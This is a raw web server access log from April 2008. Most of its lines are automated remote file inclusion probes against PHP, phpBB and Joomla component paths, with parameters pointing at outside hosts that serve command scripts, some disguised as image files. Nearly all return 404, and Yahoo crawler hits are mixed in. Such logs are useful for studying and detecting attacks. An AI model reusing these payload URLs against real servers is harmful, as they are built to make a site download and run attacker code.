81.198.83.196 - - [01/Apr/2008:05:26:23 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/h4_dy/lek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.152.130 - - [01/Apr/2008:05:26:27 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://laghaimers.com/list?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.169 - - [01/Apr/2008:05:26:43 -0700] "GET /logs/access_080215.log//ask_password.php?dir=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [01/Apr/2008:05:26:47 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.53 - - [01/Apr/2008:05:27:10 -0700] "GET /bikes/dteel/10MAR07/?N=D HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:27:29 -0700] "GET /logs/access_080211.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.64.152 - - [01/Apr/2008:05:27:42 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.29.101 - - [01/Apr/2008:05:28:24 -0700] "GET /tmp/ HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:05:28:55 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:05:28:56 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:29:32 -0700] "GET /logs/access_080228.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:30:05 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:30:05 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:30:06 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:30:42 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.27.179 - - [01/Apr/2008:05:31:01 -0700] "GET /bikes/dteel/EQ2/?S=A HTTP/1.0" 200 825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:31:35 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:31:36 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:31:36 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:32:03 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:32:04 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:32:04 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.21.120 - - [01/Apr/2008:05:32:12 -0700] "GET /bikes/dteel/10MAR07/?N=A HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.100.12.226 - - [01/Apr/2008:05:32:21 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.254.214.3 - - [01/Apr/2008:05:32:23 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [01/Apr/2008:05:32:23 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [01/Apr/2008:05:32:28 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:32:31 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.44.108 - - [01/Apr/2008:05:32:44 -0700] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.44.108 - - [01/Apr/2008:05:32:46 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.44.108 - - [01/Apr/2008:05:32:51 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:32:52 -0700] "GET /logs/access_080124.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:33:06 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:05:33:50 -0700] "GET /logs/access_080228.log//phplivehelper/initiate.php?abs_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:05:33:51 -0700] "GET //phplivehelper/initiate.php?abs_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:05:33:51 -0700] "GET /logs//phplivehelper/initiate.php?abs_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.151.162.98 - - [01/Apr/2008:05:33:55 -0700] "GET /logs/access_080313.log/index.php?pag=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:34:28 -0700] "GET /logs/access_080219.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.70.163 - - [01/Apr/2008:05:35:53 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.163 - - [01/Apr/2008:05:35:53 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.52.50 - - [01/Apr/2008:05:35:57 -0700] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:36:09 -0700] "GET /logs/access_080313.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.118.81.182 - - [01/Apr/2008:05:36:48 -0700] "GET /logs/access_080218.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.geocities.com/bangke77/cmdrfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.118.81.182 - - [01/Apr/2008:05:36:48 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.geocities.com/bangke77/cmdrfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.118.81.182 - - [01/Apr/2008:05:36:48 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.geocities.com/bangke77/cmdrfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:36:52 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.70.163 - - [01/Apr/2008:05:37:26 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:38:02 -0700] "GET /logs/access_080119.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:38:06 -0700] "GET /logs/access_080305.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.52.123 - - [01/Apr/2008:05:38:06 -0700] "GET /minamijewelry/source_images/ HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
125.24.102.112 - - [01/Apr/2008:05:38:40 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:38:44 -0700] "GET /logs/access_080213.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.177.56.40 - - [01/Apr/2008:05:38:46 -0700] "GET /protection.php?action=logout&siteurl=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
216.177.56.40 - - [01/Apr/2008:05:38:47 -0700] "GET /logs/protection.php?action=logout&siteurl=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:05:39:26 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:05:39:26 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.44.108 - - [01/Apr/2008:05:39:35 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:39:35 -0700] "GET /logs/access_080218.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:05:39:42 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.94.1.95 - - [01/Apr/2008:05:39:44 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.cms-medien.org/include/inc_ext/rsswriter/cmd3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
87.94.1.95 - - [01/Apr/2008:05:39:44 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.cms-medien.org/include/inc_ext/rsswriter/cmd3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:05:39:57 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:05:39:57 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
67.195.51.105 - - [01/Apr/2008:05:40:18 -0700] "GET /mobileoffice/?N=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:05:40:22 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:05:40:24 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:05:40:29 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:05:40:34 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:05:40:35 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:05:40:38 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:05:40:42 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:05:40:42 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:05:40:43 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.108 - - [01/Apr/2008:05:40:54 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.35 - - [01/Apr/2008:05:40:59 -0700] "GET /bikes/dteel/140CANON/?S=A HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.70.163 - - [01/Apr/2008:05:41:12 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.163 - - [01/Apr/2008:05:41:12 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.163 - - [01/Apr/2008:05:41:12 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.19.130 - - [01/Apr/2008:05:41:22 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:41:36 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.166 - - [01/Apr/2008:05:41:41 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.17.166 - - [01/Apr/2008:05:41:42 -0700] "GET /logs/access_080313.log HTTP/1.0" 200 491234 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:41:45 -0700] "GET /logs/access_080306.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.130.1 - - [01/Apr/2008:05:41:48 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.soscontacto.com.mx/rateme_v1.3.2/images/8.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.130.1 - - [01/Apr/2008:05:41:48 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.soscontacto.com.mx/rateme_v1.3.2/images/8.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:42:08 -0700] "GET /logs/access_080124.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:42:15 -0700] "GET /logs/access_080118.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.65.116 - - [01/Apr/2008:05:42:15 -0700] "GET /logs/access_080218.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.116 - - [01/Apr/2008:05:42:15 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.116 - - [01/Apr/2008:05:42:16 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:05:42:46 -0700] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:05:42:51 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:05:42:51 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:05:42:57 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.70.163 - - [01/Apr/2008:05:43:00 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.7.194 - - [01/Apr/2008:05:43:34 -0700] "GET ///administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.silak.eu//components/com_rwcard/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
87.230.7.194 - - [01/Apr/2008:05:43:35 -0700] "GET /logs///administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.silak.eu//components/com_rwcard/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
87.230.7.194 - - [01/Apr/2008:05:43:35 -0700] "GET ///administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.silak.eu//components/com_rwcard/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
87.230.7.194 - - [01/Apr/2008:05:43:36 -0700] "GET /logs///administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.silak.eu//components/com_rwcard/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
87.118.102.153 - - [01/Apr/2008:05:43:53 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
87.118.102.153 - - [01/Apr/2008:05:43:53 -0700] "GET /logs/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:44:16 -0700] "GET /logs/access_080228.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:44:22 -0700] "GET /logs/access_080104.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:45:38 -0700] "GET /logs/access_080313.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.179.239 - - [01/Apr/2008:05:45:39 -0700] "GET /blane/?N=A HTTP/1.0" 200 649 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
